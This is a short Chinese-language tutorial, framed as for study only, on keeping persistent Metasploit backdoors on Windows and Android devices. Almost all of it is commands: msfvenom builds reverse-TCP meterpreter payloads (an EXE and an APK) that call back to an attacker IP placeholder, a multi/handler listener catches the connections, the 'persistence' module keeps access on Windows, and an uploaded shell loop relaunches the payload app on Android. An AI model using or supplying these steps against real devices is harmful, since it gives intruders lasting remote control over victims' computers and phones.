## 前言:本教程只作为学习用途,切勿用于其他用途。恶意入侵他人终端属于国家明令禁止的违法行为,请务必遵守!!!
## 搭建环境:
### kali linux 2019.3
### Metasploit Framework
## windows/android后门维持
### 1. windons后门维持
// 先创建一个后门payload msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your ip> LPORT=4444 -f exe > /root/Desktop/windowsPayload.exe // 打开msf控制台,并完成相关设置 msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST <your ip> set LPORT 4444 set ExitonSession false exploit -j // 后台运行 // 连接后门成功后,创建可维持后门脚本 run persistence -h //查看帮助 run persistence -U -i 5 -r <your ip> -p 4444
### 2. Andorid后门维持
// 先创建一个后门payload msfvenom -p android/meterpreter/reverse_tcp LHOST=<your ip> LPORT=4444 -o /root/Desktop/androidPayload.apk // 创建一个维持脚本代码(lifetime.sh) #!/bin/sh while : do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity sleep 10 done // 打开msf控制台,并完成相关设置 msfconsole use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST <your ip> set LPORT 4444 set ExitonSession false exploit -j // 后台运行 // 连接后门成功后,上传后门脚本,并运行 cd /sdcard upload /root/Desktop/lifetime.sh shell // 进入被入侵终端控制台 cd /sdcard sh lifetime.sh // 运行维持脚本
## 实现效果展示(如果清晰度不够,请移步bilibili观看哦!)